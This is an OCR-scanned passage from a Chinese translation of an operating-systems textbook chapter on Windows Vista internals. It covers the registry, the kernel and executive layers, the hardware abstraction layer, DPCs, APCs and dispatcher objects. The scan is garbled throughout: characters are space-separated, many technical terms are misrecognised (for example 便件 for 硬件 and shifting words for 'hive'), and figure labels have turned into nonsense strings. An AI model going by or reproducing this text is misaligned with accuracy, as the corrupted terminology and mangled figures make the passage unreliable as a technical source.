但 是 ， 随 着 Windows 的 发 展 ， 注 册 表 已 经 变 得 无 序 。 有 些 关 于 配置 的 信 
奶 的 协议 定义 得 很 关 ， 而 且 很 多 应 用 程序 采取 了 特殊 的 方法 。 许 多 用 
户 、 应 用 程序 以 及 所 有 驱动 程序 在 运行 时 具有 私有 权限 ， 而 且 经 常 直接 
更 改 注 册 表 的 系统 参数 一 有 时 候 会 妨碍 其 他 程序 导致 系统 不 稳定 。 











注册 表 是 位 于 数据 库 和 文件 系统 之 间 的 一 个 交叉 点 ， 但 是 和 每 一 个 
都 不 像 。 有 整 本 描写 注册 表 的 书 (Born，1998;Hipson，2000;Ivens 


1998) 。 有 很 多 公司 开 及 了 特殊 的 软件 去 管理 复杂 的 注册 表 。 








regedit 能 够 以 图 形 窗 口 的 方式 来 浏览 注册 表 ， 这 个 工具 允许 你 查看 
其 中 的 文件 夹 〈 称 作 键 》 和 数据 项 〈 称 作 值 ) 。 微 软 的 新 PowerShell 脚 
本 语言 对 于 过 历 注 册 表 的 键 和 值 是 非常 有 用 的 ， 它 把 这 些 键 和 值 以 类 似 
目录 的 方式 来 看 待 。Procmon 是 一 个 比较 有 趣 的 工具 ， 可 以 从 微软 工具 


网 站 : www.microsoft.com/technet/sysinternals 中 找到 它 。 





Procmon 监 视 系统 中 所 有 对 注册 表 的 访问 。 有 了 时， 一 些 程序 可 能 会 
重复 访问 同一 个 键 达 数 万 次 之 多 。 


正如 名 字 所 显示 的 那样 ， 注 册 表 编辑 器 允许 用 户 对 注册 表 进 行 编 
辑 ， 但 是 一 旦 你 这 么 做 就 必须 非常 小 心 。 它 很 容易 造成 系统 无 法 引导 或 
损坏 应 用 软件 的 安装 ， 因 此 没有 一 些 专业 技巧 就 不 要 去 修改 它 。 微 软 承 
诺 会 在 以 后 发 布 时 清理 注册 表 ， 但 现在 它 仍 是 庞杂 的 一 堆 一 一 比 UNIX 
保留 的 配置 信息 复杂 得 多 。 























微软 Windows Vista 已 经 引入 了 一 个 基于 事务 管理 的 内 核 ， 用 来 文 持 
对 跨越 文件 系统 和 注册 表 操 作 的 事务 进行 协调 。 微 软 计划 在 未 来 使 用 该 
功能 以 避免 由 于 软件 非 完 全 正确 安装 而 在 系统 目录 和 注册 表 储 桌 中 留 下 
当时 局 部 状态 信息 所 造成 的 元 数据 就 用 问题 。 








Win32 程 序 员 通过 函数 调用 可 以 很 方便 地 访问 注册 表 ， 包 括 创 建 、 
删除 键 、 但 询 键 值 等 。 如 图 11-12 所 示 。 


Win32 API 函数 
创建 一 个 新 的 注册 表 键 
删除 一 个 注册 表 键 


打开 一 个 键 于 获得 林彬 
列举 某 个 键 的 下 级 列 键 


RegQuery ValueEx 但 询 键 内 的 数据 值 





图 11-12 一 些 使 用 注册 表 的 Win32 API 调 用 





当 系 统 关 闭 时 ， 大 部 分 的 注册 表 信 息 被 存储 在 人 硬盘 储 旧 中。 因为 极 
其 严格 的 完整 性 要 求 使 得 需要 纠正 系统 功能 ， 目 动 实 现 备 份 ， 将 元 数据 
冲 写 入 人 硬盘 以 防止 在 发 生 系统 骨 湿 时 所 造成 的 损坏 。 注 册 表 损坏 需要 重 
新 安装 系统 上 的 所 有 软件 。 


11.3 系统 结构 





前 面 的 章节 从 用 户 态 下 程序 员 写 代码 的 角度 研究 了 Windows Vista 系 
统 。 现 在 我 们 将 观察 系统 是 如 何 组 织 的 ， 不 同 的 部 件 承 担 什 么 工作 以 及 
它们 彼此 间或 者 和 用 户 程序 间 是 如 何 配合 的 。 这 是 实现 底层 用 户 态 代码 
的 程序 开发 人 员 所 能 看 见 的 操作 系统 部 分 ， 类 似 于 子 系统 和 本 地 服务 ， 
以 及 提供 给 设备 驱动 程序 开发 者 的 系统 视图 。 








尽管 有 很 多 关于 Windows 使 用 方面 的 书籍 ， 但 很 少 有 书 讲述 它 是 如 
何 工作 的 。 不 过 ， 查 阅 《Microsoft Windows Internals, 4th ed) 
(Russionvich 和 Solomon，2004) 是 其 中 最 好 的 选择 之 一 。 该 书 描述 的 
虽然 是 Windows XP， 但 大 部 分 的 描述 还 是 准确 的 。 束 内 部 机 制 而 言 ， 
Windows XP 和 Windows Vista 是 非常 相近 的 。 





， 微 软 通过 Windows 学 术 计 划 为 大 学 教员 和 学 生 提 供 对 其 有 帮 
助 的 Windows 内 核 信息 。 该 计划 会 发 布 大 部 分 Windows Server 2003/4 1% 
源 代码 、Cutler 团 队 的 原始 NT 设计 文档 和 一 大 套 源 自 Windows Internals 
书籍 的 表述 资料 。 另 外 ，Windows 驱 动工 具 也 会 提供 大 量 内 核 工 作 信 
电 ， 因 为 设备 驱动 器 不 仅 使 用 IO 设备 ， 还 需要 使 用 进程 、 线 程 、 虚 拟 
内 存 和 进程 间 的 通信 等 





11.3.1 操作 系统 结构 


Windows Vista 操 作 系统 包括 很 多 层 ， 如 图 11-6 所 示 。 在 以 下 章节 我 
们 将 研究 操作 系统 中 工作 于 内 核 态 的 最 底 级 层次 。 其 中 心 就 是 NOTS 内 
核 层 自身 ， 当 Windows 启 动 时 由 ntoskrnl.exe 加 载 。NTOS 包 括 两 层 ， 
executive CHÁT) 提供 大 部 分 的 服务 ， 另 一 个 较 小 的 层 称 为 内 核 
(kernel) ， 负 责 实 现 基 础 线程 计划 和 同步 抽象 ， 同 时 也 执行 陷入 句柄 
中 断 以 及 管理 CPU 的 其 他 方面 。 





将 NTOS 分 为 内 核 和 执行 体 体现 了 NT 的 VAX/VMS 根 源 。VMS 操 作 
系统 也 是 由 Cutler 团 队 设计 的 ， 可 分 为 4 个 由 硬件 实施 的 层次 : 用 户 、 管 
理 程序 、 执 行 体 和 内 核 ， 与 VAX 处 理 机 结构 提供 的 4 种 保护 模式 一 致 。 
Intel CPU 也 支持 这 4 种 保护 环 ， 但 是 一 些 早 期 的 NT 处 理 机 对 此 不 支持 ， 
因此 内 核 和 执行 体 表 现 了 由 软件 实施 的 抽象 ， 同 时 VMS 在 管理 者 模式 下 
提供 的 功能 ， 如 假 脱 机 打印 ，NT 是 作为 用 户 态 服务 提供 的 。 


NT 的 内 核 态 层 如 图 11-13 所 示 。NTOS 的 内 核 层 在 执行 体 层 之 上 ， 
因为 它 实 现 了 从 用 户 态 到 内 核 态 转换 的 陷入 和 中 断 机 制 。 图 11-13 所 示 
的 最 顶层 是 系统 库 ntdll.dll， 它 实际 工作 于 用 户 态 。 系 统 库 包括 许多 为 编 
译 占 运行 提供 的 支持 功能 以 及 低级 库 ， 类 似 于 UNIX 中 的 libc。Ntdll.dll 
也 包括 了 特殊 码 输入 指针 以 支持 内 核 初始 化 线程 、 分 发 异常 和 用 户 态 的 
异步 过 程 调用 (Asynchronous Procedure Calls, APC) 等 。 因 为 系统 库 





对 内 核 运行 是 必需 的 ， 所 以 每 个 由 NTOS 创 建 的 用 户 态 进 程 都 具有 相同 
固定 地 址 描绘 的 ntdl。 当 NTOS 初 始 化 系统 时 ， 会 创建 一 个 局 部 目标 并 
且 记 录 下 内 核 使 用 的 ntdll 输 入 指针 地 址 。 


系统 库 核 心 用 户 态 分 派 例 程 (ntdll.dlD) 








NTOS 陷阱 / 异 第 /中 断 分 配 


内 核 层 CPU 调 度 和 同步 ;线程 、ISRs、DPCs、APCs 


驱动 ， 文 件 ||| 进程 和 线程 | ”虚拟 内 存 
系统 ， 卷 管理 


at» TCP/IP 栈 ， VO‘ Eh at 
网 络 接口 ， 图 
形 设备 ， 所 有 Baste 17 N E 
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硬件 CPU, MMU, Pirita WA WERK, BIOS 





图 11-13 Windows 内 核 态 组 织 结构 





在 NTIOS 内 核 和 执行 体 层 之 下 是 称 为 硬件 抽象 层 〈Hardware 
Abstraction Layer, HAL) 的 软件 ， 该 软件 对 类 似 于 设备 寄存 器 存 取 和 
DMA 操 作 之 类 的 底层 硬件 信息 进行 抽象 ， 同 时 还 就 BIOS 固 件 是 如 何 表 
述 配 置信 息 和 处 理 CPU 芯 片上 的 不 同 〈 如 各 种 中 断 控 制 器 ) 进行 抽象 。 
BIOS 可 以 从 很 多 公司 获得 ， 并 且 被 集成 为 计算 机 母 板 上 的 永久 内 存 。 





内 核 态 下 万 一 个 主要 部 件 就 是 设备 驱动 散 。Windows 内 核 态 下 任何 
非 NTOS 或 HAL 的 设备 都 会 用 到 设备 驱动 器 ， 包 括 文件 系统 、 网 络 协议 


栈 和 其 他 如 防 病 毒 程 序 、DRM 软 件 之 类 的 内 核 扩 展 ， 以 及 与 便 件 总 线 
接口 的 管理 物理 设备 驳 动 器 等 。 


IO 和 虚拟 内 存 部 件 协作 加 载 设 备 驱 动 程序 至 内 核 存 储 器 并 将 它们 
连接 到 NTOS 和 HAL 层 。1/O 管 理 器 提供 发 现 、 组 织 和 操作 设备 的 接口 ， 
包括 安排 加 载 适 当 的 设备 驱动 程序 等 。 大 多 数 管理 设备 和 驱动 器 的 配置 
音 息 都 保留 在 注册 表 的 系统 储 梨 中 。IO 管 理 器 的 即 揪 即 用 下 层 部 件 保 
留 硬 件 储 集 内 检测 出 的 硬件 信息 ， 该 储 巢 是 保留 在 内 存 中 的 可 变 储 集 而 
非 存 在 于 硬盘 中 ， 系 统 每 次 引导 都 会 重新 创建 。 


以 下 将 详细 介绍 操作 系统 的 不 同 部 件 。 


1. 硬 件 抽象 层 





正如 之 前 发 布 的 基于 NT 的 Windows 系 统一 样 ，Windows Vista 的 目 
标 之 一 是 使 得 操作 系统 在 不 同 的 硬件 平台 之 间 有 具有 可 移植 性 。 理 想 情 况 
下 ， 如 果 需 要 在 一 种 新 型 计算 机 系统 中 运行 该 操作 系统 ， 仅 仅 需 要 在 首 
次 运行 时 使 用 新 机 器 编译 器 重新 编译 操作 系统 即 可 。 但 实际 上 并 没有 那 
么 人 简单。 操作 系统 各 层 有 大 量 部 件 具有 很 好 的 可 移植 性 (因为 它们 主要 
处 理 支 持 编 程 模式 的 内 部 数据 结构 和 抽象 ， 从 而 支持 特定 的 编 成 模 
式 ) ， 其 他 层 就 必须 处 理 设 备 寄 存 器 、 中 断 、DMA 以 及 机 器 与 机 器 间 
显著 不 同 的 其 他 硬件 特征 。 














大 多 数 NTOS 内 核 源 代码 由 C 语 言 编写 而 非 汇 编 语言 (x86 中 仪 2% 是 





汇编 语言 ， 比 x64 少 19%) 。 然 而 ， 所 有 这 些 C 语 言 代 码 都 不 能 简单 地 从 
Xx86 系 统 中 移植 到 一 个 SPARC 系 统 ， 然 后 重新 编译 、 重 新 引导 ， 因 为 与 
不 同 指令 集 无 天 并 且 不 能 被 编译 器 隐藏 的 处 理 机 结构 及 其 硬件 有 很 多 不 
同 。 像 C 这 样 的 语言 难以 抽象 硬件 数据 结构 和 参数 ， 如 页 表 输入 格式 、 
物理 存储 页 大 小 和 字 长 等 。 所 有 这 些 以 及 大 量 的 特定 人 硬件 的 优化 即使 不 
用 汇编 语言 编写 ， 也 将 不 得 不 手工 处 理 。 











大 型 服务 器 的 内 存 如 何 组 织 或 者 何 种 硬件 同步 基 元 是 可 获得 的 ， 与 
此 相关 的 人 硬件 细 市 对 系统 较 高 层 都 有 比较 大 的 影响 。 例 如 ，NT 的 虚拟 
内 存 管理 器 和 内 核 层 了 解 涉及 内 存 和 内 存 位 置 的 硬件 细节 。 在 整个 系统 
中 ，NT 使 用 的 是 比较 和 交换 同步 基 元 ， 对 于 没有 这 些 基 元 的 系统 是 很 
难 移植 上 去 的 。 最 后 ， 系 统 对 字 内 的 字 节 分 类 系统 存在 很 多 相关 性 。 在 
所 有 NT 原来 移植 到 的 平台 上 ， 便 件 是 设置 为 小 端 Clittle-endian) 模式 
的 。 

















除了 以 上 这 些 影响 便携 性 的 较 大 问题 外 ， 不 同 制造 商 的 不 同 母 板 还 
存在 大 量 的 小 问题 。CPU 版 本 的 不 同 会 影响 同步 基 元 的 实现 方式 。 各 种 
支持 心 厂 组 也 会 在 人 硬件 中 断 的 优先 次 序 、1/O 设 备 寄存 强 的 存 取 、DMA 
转换 管理 、 定 时 器 和 实时 时 钟 控制 、 多 处 理 器 同步 、BIOS 设 备 (如 
ACPJ) 的 工作 等 方面 产生 差异 。 微 软 尝 试 通过 最 下 端的 HAL 层 隐藏 对 这 
些 设备 类 型 的 依赖 。HAL 的 工作 就 是 对 这 些 硬件 进行 抽象 ， 隐 藏 处 理 器 
版 本 、 支 持 心 厂 集 和 其 他 配置 变更 等 具体 细节 。 这 些 HAL 抽 象 展现 为 

















NTOS 和 驱动 可 用 的 独立 于 机 需 的 服务 。 


使 用 HAL 服 务 而 不 直接 写 硬 件 地 址 ， 驱 动 器 和 内 核 在 与 新 处 理 器 通 
信 时 只 需要 较 小 改变 ， 而 且 在 多 数 情况 下 ， 尽 管 版 本 和 文 持 心 片 集 不 同 
但 只 要 有 相同 的 处 理 器 结构 ， 系 统 中 所 有 部 件 均 无 需 修 改 就 可 运行 。 














HAL 对 诸如 键盘 、 鼠 标 、 便 盘 等 特殊 的 IO 设备 或 内 存 管理 单元 不 
提供 抽象 或 服务 。 这 种 抽象 功能 广泛 应 用 于 整个 内 核 态 的 各 部 件 ， 如 果 
没有 HAL， 通 信 时 即使 硬件 间 很 小 的 差异 也 会 造成 大 量 代 码 的 重大 修 
改 。HAL 目 身 的 通信 很 简单 ， 因 为 所 有 与 机 器 相关 的 代码 都 集中 在 一 个 
地 方 ， 移 植 的 目标 就 很 容易 确定 : 即 实现 所 有 的 HAL 服 务 。 很 多 版 本 
中 ， 微 软 都 文 持 HAL 扩 展 工具 包 ， 人 允许 系统 制造 者 生产 各 目的 HAL 从 而 
使 得 其 他 内 核 部 件 在 新 系统 中 无 需 更 改 即 可 工作 ， 当 然 这 要 在 硬件 更 改 
不 是 很 大 的 前 提 下 。 














通过 内 存 上 映射 WO 与 VO 端口 的 对 比 可 以 更 好 地 了 解 硬 件 抽象 层 是 如 
何 工作 的 。 一 些 机 器 有 内 存 映 射 /O， 而 有 的 机 器 有 LO 端口 。 驱 动 程序 
是 如 何 编 写 的 呢 ?” 是 不 是 使 用 内 存 映 射 WO? 无 需 强制 做 出 选择 ， 只 需 
要 判断 哪 种 方式 使 驱动 程序 可 独立 于 机 器 运行 即 可 。 硬 件 抽象 层 为 驱动 
程序 编写 者 分 别提 供 了 三 种 读 、 写 设备 寄存 器 的 程序 : 











uc=READ PORT UCHAR (port) ;WRITE PORT UCHAR(port,uc) ; 
us=READ PORT USHORT (port) ;WRITE PORT USHORT (port, us) ; 
ul=READ PORT ULONG (port) ;WRITE PORT ULONG(port,ul); 



























































这 些 程序 各 自在 指定 端口 读 、 写 无 符号 8、16、32 位 整数 ， 由 硬件 
抽象 层 决 定 这 是 否 需要 内 存 映射 1O。 这 样 ， 驱 动 程序 可 以 在 设备 寄存 
器 实现 方式 有 差异 的 机 器 间 使 用 而 不 需要 修改 。 

















驱动 程序 会 因为 不 同 目的 而 频繁 存 取 特定 的 O 设 备 。 在 硬件 层 ， 
一 个 设备 在 确定 的 总 线 上 有 一 个 或 多 个 地 址 。 因 为 现代 计算 机 通常 有 多 
个 总 线 (ISA、PCI、PCI-X、USB、1394 等 ) ， 这 就 可 能 造成 不 同 总 线 
上 的 多 个 设备 有 相同 的 地 址 ， 因 此 需要 一 些 方法 来 区 别 它 们 。HAL 把 与 
忆 线 相关 的 设备 地 址 映射 为 系统 逻辑 地 址 并 以 此 来 区 分 设备 。 这 样 ， 豫 
动 程序 就 无 需 知道 何 种 设备 与 何 种 总 线 相关 联 。 这 种 机 制 也 保护 了 较 高 
层 避 免 进行 总 线 结构 和 地 址 规约 的 交 蔡 。 





中 断 也 存在 相似 的 问题 一 一 总 线 依赖 性 。HAL 同 样 提供 服务 在 系统 
范围 内 命名 中 断 ， 并 且 允 许 驱 动 程序 将 中 断 服 务 程序 附 在 中 断 内 而 无 需 
知道 中 断 向 量 与 总 线 的 关系 。 中 断 请 求 管 理 也 受 HAL 控 制 。 








HAL 提 供 的 另 一 个 服务 是 在 设备 无 关 方式 下 建立 和 管理 DMA 转 
换 ， 对 系统 范围 和 专用 IO 卡 的 DMA 引 擎 进行 控制 。 设 备 由 其 逻辑 地 址 
指示 。HAL 实 现 软件 的 散布 /聚合 (从 不 相 邻 的 物理 内 存 块 的 地 方 写 或 
者 读 ) 。 





HAL 也 是 以 用 一 种 可 移植 的 方式 来 管理 时 钟 和 定时 器 的 。 定 时 右 是 
以 100 纳 秒 为 单位 从 1601 年 1 月 1 日 开始 计数 的 ， 因 为 这 是 1601 年 的 第 一 


天 ， 简 化 了 周年 的 计算 。《 一 个 简单 测试 : 1800 年 是 周年 吗 ? 答案 : 不 
Æo ) 定时 顺服 务 和 驱动 程序 中 的 时 钟 运行 的 频率 是 解 簿 合 的 。 








有 时 需要 在 底层 实现 内 核 部 件 的 同步 ， 尤 其 是 为 了 防止 多 处 理 机 系 
统 中 的 竞争 环境 。HAL 提 供 基 元 管理 同步 ， 如 旋转 锁 ， 此 时 一 个 CPU 等 
符 其 他 CPU 释放 资源 ， 比 较 特 殊 的 情况 是 资源 被 几 个 机 需 指 令 占 有 。 


最 终 ， 系 统 引 导 后 ，HAL 和 BIOS 通 信 ， 检 查 系 统 配 置信 息 以 查 明 
系统 所 包含 的 总 线 、LIO 设 备 及 其 配置 情况 ， 同 时 该 信息 被 添加 进 注 册 
表 。HAL 工 作 情 况 摘要 如 图 11-14 所 示 。 


设备 寄存 器 设备 地 址 中断 DMA 计时 器 自 旋 锁 BIOS 











便 件 抽象 层 


图 11-14 一 些 HAL 管 理 相 关 的 硬件 功能 


2. 内 核 层 


在 人 硬件 抽象 层 之 上 是 NTOS， 包 括 两 层 : 内 核 和 执行 体 。“ 内 核 * 在 
Windows 中 是 一 个 易 混淆 的 术语 。 它 可 以 指 运行 在 处 理 机 内 核 态 下 的 所 


有 代码 ， 也 可 以 指 包 含 了 Windows 操 作 系统 核心 NTOS 的 ntoskrnlexe 文 
件 ， 还 可 以 指 NTOS 里 的 内 核 层 ， 在 本 章 中 我 们 使 用 这 个 概念 。 此 
Sh, “内核” 甚至 用 来 命名 用 户 态 下 提供 本 地 系统 调用 的 封装 器 的 Win32 
JÆ: kernel32.dll。 





Windows 操 作 系 统 的 内 核 层 (如 图 11-13 所 示 ， 执 行 体 之 上 ) 提供 了 
一 套 宣 理 CPU 的 抽象 。 最 核心 的 抽象 是 线程 ， 但 是 内 核 也 实现 了 腊 第 处 
理 、 陷 阱 以 及 各 种 中 断 。 文 持 线程 的 数据 结构 的 创建 和 终止 是 在 执行 体 
实现 的 。 核 心 层 负责 调度 和 同步 线程 。 在 一 个 单独 的 层 内 支持 线程 ， 允 
许 执 行 体 在 用 户 态 下 ， 可 以 通过 使 用 用 来 编写 并 行 代码 且 相 同 优先 级 的 
多 线程 模型 来 执行 ， 但 同步 原 语 的 执行 更 专业 。 











内 核 线程 调度 程序 负责 决定 哪些 线程 执行 在 系统 的 每 一 个 CPU 上 。 
线程 会 一 直 执 行 ， 直 到 产生 了 一 个 定时 喜 中 断 ， 或 者 是 当 线程 需要 等 符 
一 些 情况 ， 比 如 等 待 一 个 IO 读 写 完成 或 是 一 个 锁定 被 释放 ， 或 者 是 更 
高 优先 级 的 线程 等 待 运行 而 需要 CPU， 这 时 正在 执行 的 线程 会 切换 到 另 
一 个 线程 〈 量 子 过 期 ) 。 当 一 个 线程 同 男 一 个 线程 转换 时 ， 调 度 程序 会 
在 CPU 上 运行 ， 并 确保 寄存 器 及 其 他 硬件 状态 已 保存 。 然 后 ， 调 度 程 序 
会 选择 尺 一 个 线程 在 CPU 上 运行 ， 并 且 恢 复 之 前 所 保存 的 最 后 一 个 线程 


的 运行 状态 。 








如 果 下 一 个 运行 的 线程 是 在 一 个 不 同 的 地 址 空间 (例如 进程 》， 调 
度 程 序 也 必须 改变 地 址 空间 。 详 细 的 调度 算法 我 们 将 在 本 章 内 谈 到 进程 


和 线程 时 讨论 。 


除了 提供 更 高 级 别 的 硬件 抽象 和 线程 转换 机 制 ， 核 心 层 还 有 另外 一 
项 关键 功能 : 提供 对 下 面 两 种 同步 机 制 低级 别 的 文 持 : control 对 象 和 
dispatcher 对 象 。Control 对 象 ， 是 核心 层 癌 执行 体 提供 抽象 的 CPU 管理 的 
一 种 数据 结构 。 它 们 由 执行 体 来 分 配 ， 但 由 核心 层 提供 的 例 程 来 操作 。 
Dispatcher 对 象 是 一 种 普通 执行 对 象 ， 使 用 一 种 公用 的 数据 结构 来 同 
步 。 





3. 延 迟 过 程 调用 


Control 对 象 包 括 线程 、 中 断 、 定 时 器 、 同 步 、 调 试 等 一 些 原 语 对 
象 ， 和 两 个 用 来 实现 DPC 和 APC 的 特殊 对 象 。DPC“《 延 迟 过 程 调用 ) 对 
象 是 用 来 减少 执行 ISR〔 中 断 服 务 例 程 》 所 需要 的 时 间 ， 以 响应 从 特定 
的 设备 来 的 中 断 。 


系统 硬件 为 中 断 指 定 了 硬件 优先 级 。 在 CPU 进行 工作 时 也 伴随 着 一 
个 优先 级 。CPU 只 啊 应 比 当前 更 高 优先 级 的 中 断 。 通 币 的 优先 级 是 0， 
包括 所 有 用 户 态 下 的 优先 级 。 设 备 中 断 发 生 在 优先 级 3 或 更 高 ， 让 一 个 
设备 中 断 的 ISR 以 同一 优先 级 的 中 断 来 执行 是 防止 其 他 不 重要 的 中 断 影 
啊 它 正在 进行 的 重要 中 断 。 





如 琳 ISR 执 行 得 太 长 ， 提 供给 低 优先 级 中 断 的 服务 将 被 推迟 ， 可 能 
造成 数据 丢失 或 减缓 系统 的 MO 吞吐 量 。 多 ISR 可 以 在 任何 同一 时 刻 处 





理 ， 每 一 个 后 续 的 ISR 是 由 于 产生 了 更 高 优先 级 的 中 断 。 


为 了 减少 处 理 ISR 所 花费 的 时 间 ， 只 有 关键 的 操作 才 执 行 ， 如 IO 操 
作 结 果 的 捕捉 和 设备 重 置 。 直 到 CPU 的 优先 级 降低 ， 且 没有 其 他 中 断 服 
务 阻 塞 ， 才 会 进行 下 一 步 的 中 断 处 理 。DPC 对 象 用 来 表示 将 要 做 的 工 
作 ，ISR 调 用 核心 层 排列 DPC 到 特定 处 理 器 上 的 DPC 队列 。 如 条 DPC 在 
队列 的 第 一 个 位 置 ， 内 核 会 登记 一 个 特殊 的 硬件 请 求 让 CPU 在 优先 级 2 
产生 中 断 (NT 下 称 为 DISPATCH 级 别 ) 。 当 最 后 一 个 执行 的 ISR 完 成 
后 ， 处 理 器 的 中 断 级 别 将 回落 到 低 于 2， 这 将 解 开 DPC 处 理 中 断 。 服 务 
于 DPC 中 断 的 ISR 将 会 处 理 内 核 排列 好 的 每 一 个 DPC 对 象 。 


利用 软 中 断 延迟 中 断 处 理 是 一 种 行 之 有 效 的 减少 ISR 延 迟 时 间 的 方 
法 。UNIX 和 其 他 系统 在 20 世 纪 70 年 代 开 始 使 用 延迟 处 理 ， 以 处 理 绥 慢 
的 硬件 和 有 限 的 缓冲 串 行 连接 终端 。ISR 负 责 处 理 从 硬件 提取 字符 并 排 
列 它们 。 在 所 有 高 级 别 的 中 断 处 理 完成 以 后 ， 软 中 断 将 执行 一 个 低 优 先 
级 的 ISR 做 字符 处 理 ， 比 如 通过 向 终端 发 送 控制 字符 来 执行 一 个 退 格 
键 ， 以 抹 去 最 后 一 个 显示 字符 并 向 后 移动 光标 。 














在 当前 的 Windows 操 作 系统 下 ， 类 似 的 例子 是 键盘 设备 。 当 一 个 键 
被 襄 击 以 后 ， 键 盘 ISR 从 寄存 器 中 读 取 键 值 ， 然 后 重新 使 键盘 中 断 ， 但 
并 不 对 下 一 步 的 按键 进行 及 时 处 理 。 相 反 ， 它 使 用 一 个 DPC 去 排队 处 理 
键 值 ， 直 到 所 有 优先 的 设备 中 断 已 处 理 完 成 。 


因为 DPC 在 级 别 2 上 运行 ， 它 们 并 不 干涉 ISR 设 备 的 执行 ， 在 所 有 排 
队 中 的 DPC 执行 完成 并 且 CPU 的 优先 级 低 于 2 之 前 ， 它 们 会 阻止 任何 线 
程 的 运行 。 设 备 驱动 和 系统 本 身 必 须 注意 不 要 运行 ISR 或 DPC 太 长 时 
间 。 因 为 在 运行 它们 的 时 候 不 能 运行 线程 ，ISR 或 DPC 的 运行 会 使 系统 
出 现 延 迟 ， 并 且 可 能 在 播放 音乐 时 产生 不 连续 ， 因 为 拖延 了 线程 对 声卡 
的 音乐 缓冲 区 的 写 操作 。DPC 男 一 个 通常 的 用 处 是 运行 程序 以 响应 定时 
器 中 断 。 为 了 避免 线程 阻塞， 要 延长 运行 时 间 的 定时 器 事件 需要 同 内 核 
维持 后 台 活 动 的 线程 工作 池 做 排队 请 求 。 这 些 线程 有 调度 优先 级 12、13 
或 15。 我 们 会 在 线程 调度 部 分 看 到 ， 这 些 优先 级 意味 着 工作 项 目 将 会 先 
于 大 多 数 线程 执行 ， 但 是 不 会 打 断 实时 线程 。 











4. 异 步 过 程 调 用 


另 一 个 特殊 的 内 核 控 制 对 象 是 APC〔( 异 步 过 程 调用 ) 对 象 。APC 与 
DPC 的 相同 之 处 是 它们 都 是 延迟 处 理 系统 例 行 程 序 ， 不 同 之 处 在 于 DPC 
是 在 特定 的 CPU 上 下 文中 执行 ， 而 APC 是 在 一 个 特定 的 线程 上 下 文中 执 
行 。 当 处 理 一 个 键盘 敲 击 操作 时 ，DPC 在 哪 一 个 上 下 文中 运行 是 没有 关 
系 的 ， 因 为 一 个 DPC 仅仅 是 处 理 中 断 的 另 一 部 分 ， 中 断 只 需要 管理 物理 
设备 和 执行 独立 线程 操作 ， 例 如 在 内 核 空 间 的 一 个 缓冲 区 记录 数据 。 














当 原 始 中 断 发 生 时 ，DPC 例 程 运 行 在 任何 线程 的 上 下 文中 。 它 利用 
IO 系统 来 报告 IO 操作 已 经 完成 ，IO 系 统 排列 一 个 APC 在 线程 的 上 下 文 
中 运行 从 而 做 出 原始 的 VO 请 求 ， 在 这 里 它 可 以 访问 处 理 输入 的 线程 的 


用 户 态 地 址 空间 。 


在 下 一 个 合适 的 时 间 ， 内 核 层 会 将 APC 移 交 给 线程 而 且 调度 线程 运 
行 。 一 个 APC 被 设计 成 看 上 去 像 一 个 非 预期 的 程序 调用 ， 有 些 类 似 于 
UNIX 中 的 信号 处 理 程序 。 不 过 在 内 核 态 下 ， 内 核 态 的 APC 为 了 完成 VO 
操作 ， 而 在 完成 初始 化 VO 操作 的 线程 的 上 下 文中 执行 。 这 使 APC 既 可 
以 访问 内 核 态 的 缓冲 区 ， 又 可 以 访问 用 户 态 下 ， 属 于 包含 线程 的 进程 的 
地 址 空间 。 一 个 APC 在 什么 时 候 被 移交， 取决 于 线程 已 经 在 做 什么 ， 以 
及 系统 的 类 型 是 什么 。 在 一 个 多 处 理 器 系统 中 ， 甚 至 是 在 DPC 完成 运行 
之 前 ， 接 收 APC 的 线程 才 可 以 开始 执行 。 





用 户 态 下 的 APC 也 可 以 用 来 把 用 户 态 的 VO 操作 已 经 完成 的 信息 ， 
通知 给 初始 化 IO 操作 的 线程 。 但 只 有 当 内 核 中 的 目标 线程 被 阻塞 和 被 
标示 为 准备 接收 APC 时 ， 用 户 态 下 的 APC 才 可 调用 用 户 态 下 的 应 用 程 
序 。 但 随 着 用 户 态 扒 栈 和 寄存 器 的 修改 ， 为 了 执行 在 ntdll.dl 系 统 库 中 的 
APC 调 度 算法 ， 内 核 将 等 待 中 的 线程 中 断 ， 并 返回 到 用 户 态 。APC 调 度 
算法 调用 和 IO 操作 相关 的 用 户 态 应 用 程序 。 除 了 一 些 IO 完 成 后 ， 作 为 
一 种 执行 代码 方法 的 用 户 态 下 的 APC 外 ，Win32 API 中 的 QueueUserAPC 
允许 将 APC 用 于 任意 目的 。 





执行 体 也 使 用 除了 LO 完成 之 外 的 一 些 APC 操 作 。 由 于 APC 机 制 精 
心 设计 为 只 有 当 它 是 安全 的 时 候 才 提供 APC， 它 可 以 用 来 安全 地 终止 线 
程 。 如 果 这 不 是 一 个 终止 线程 的 好 时 机 ， 该 线程 将 宣布 它 已 进入 一 个 临 





界 区 ， 并 延期 交付 APC 直 至 得 到 许可 。 在 获得 锁 或 其 他 资源 之 前 ， 内 核 
线程 会 标记 自己 已 进入 临界 区 并 延 运 APC， 这 时 ， 它 们 不 能 被 终止 ， 并 
仍然 持 有 资源 。 








5. 调 度 对 象 





另 一 种 同步 对 象 是 调度 对 象 。 这 是 种 用 的 内 核 态 对 象 〈 一 种 用 户 可 
以 通过 句柄 处 理 的 类 型 ) ， 它 包含 一 个 称 为 dispatcher_header 的 数据 结 
构 ， 如 图 11-15 所 示 。 








通知 / 同步 标记 


执行 体 


Xf HK DISPATCHER_HEADER 






等 待 线程 队列 的 头 


对 象 相关 的 数据 


图 11-15 执行 对 象 中 谱 入 的 dispatcher_header 数 据 结构 


它们 包括 信号 器 、 互 斥 体 、 事 件 、 可 等 待定 时 器 和 其 他 一 些 可 以 等 
竺 其 他 线程 同步 执行 的 对 象 。 它 们 还 包括 表示 打开 的 文件 的 对 象 、 进 
程 、 线 程 和 IPC 端 口 。 调 度数 据 络 构 包含 了 表示 对 象 状态 的 标志 ， 和 等 
符 被 标记 的 对 象 的 线程 队列 。 


同步 原 语 ， 如 信和 号 器 ， 是 标准 的 调度 对 象 。 另 外 定时 露 、 文 件 、 疹 
口 线程 和 进程 使 用 调度 对 象 机 制 去 通知 。 当 一 个 定时 髓 开局 、 一 个 文件 





LO 完成 、 一 个 关口 正 在 传输 数据 或 是 一 个 线程 或 进程 终止 时 ， 相 关 的 
调度 对 象 会 被 通知 ， 并 唤醒 所 有 等 竺 该 事 件 的 线程 。 





由 于 Windows 使 用 了 一 个 单一 的 标准 机 制 去 同步 内 核 态 对 象 ， 一 些 
专门 的 API 就 无 需 再 等 待 事件 ， 例 如 在 UNIX 中 用 来 等 待 子 进 程 的 
